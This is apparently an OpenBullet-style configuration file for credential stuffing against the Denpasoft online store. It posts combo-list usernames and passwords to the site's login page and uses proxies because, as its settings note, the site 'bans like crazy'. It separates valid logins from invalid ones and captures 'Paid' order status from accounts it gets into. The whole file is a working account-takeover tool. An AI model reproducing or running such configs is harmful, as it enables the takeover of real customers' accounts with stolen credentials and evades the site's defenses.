[SETTINGS]
{
  "Name": "Denpasoft",
  "SuggestedBots": 1,
  "LastModified": "2018-08-09T03:34:12.0213328+00:00",
  "AdditionalInfo": "Porn Games, Havent really tested the bot amount, Bans like crazy need good proxies",
  "Author": "PepeLeSpooder",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "None",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Getter REQUEST GET "https://denpasoft.com/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#Login REQUEST POST "https://denpasoft.com/account/login" AutoRedirect=TRUE 
  CONTENT "form_type=customer_login&utf8=%E2%9C%93&customer%5Bemail%5D=<USER>&customer%5Bpassword%5D=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "referer: https://denpasoft.com/" 
  HEADER "origin: https://denpasoft.com" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "My Account" 
  KEYCHAIN Failure OR 
    KEY "Invalid login credentials" 
PARSE "<SOURCE>" LR "" "" Recursive=FALSE -> CAP "<td>Paid</td>" "" "" 
